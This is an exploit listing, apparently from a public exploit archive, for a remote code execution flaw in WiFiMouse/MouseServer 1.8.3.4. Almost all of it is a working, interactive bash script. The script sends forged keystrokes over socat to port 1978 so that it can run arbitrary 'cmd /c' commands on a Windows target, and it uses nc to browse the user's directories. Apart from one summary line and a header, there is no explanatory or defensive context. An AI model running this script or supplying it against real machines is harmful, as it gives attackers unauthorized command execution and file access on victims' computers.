WiFiMouse 1.8.3.4 Remote Code Execution

WiFiMouse version 1.8.3.4 suffers from a remote code execution vulnerability.


SHA-256 | dcee2f3f5c3ab2a8df29abd14197cd5010f6cb612ffbe07e1a7870f3004c0108

# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
# Date: 15-08-2022
# Author: Febin
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.4
# Tested on: Windows 10

#!/bin/bash
printf "
WiFiMouse / MouseServer 1.8.3.4 Exploit

by FEBIN

"

printf "[*] Enter the Target IP Address: "
read TARGET



rce(){
printf "[*] Enter the Command to execute on the Target: "
read CMD

sh -c "echo 'key 9[R] WIN d';sleep 1;echo 'key 9[R] WIN u';sleep 1;echo 'utf8 cmd /c $CMD';sleep 1;echo 'key 9[R] RTN u'" | socat - TCP4:$TARGET:1978
}

dirlist(){

echo "[*] User's Home Directory Contents:"

echo 'fileexplorer ~/' | nc $TARGET 1978 | strings | cut -b 2-

while $true
do
printf "\nList Directory:> "
read DIR
echo "[+] Contents of $DIR: "
echo "fileexplorer ~/$DIR" | nc $TARGET 1978 | strings | cut -b 2-
done


}

printf "
[1] Remote Command Execution
[2] Directory Listing

"
printf "Enter Your Choice (1 or 2) : "
read CHOICE

if [[ $CHOICE == "1" ]]
then
rce
elif [[ $CHOICE == "2" ]]
then
dirlist

else
echo "[-] Invalid Choice!"
fi


Related Posts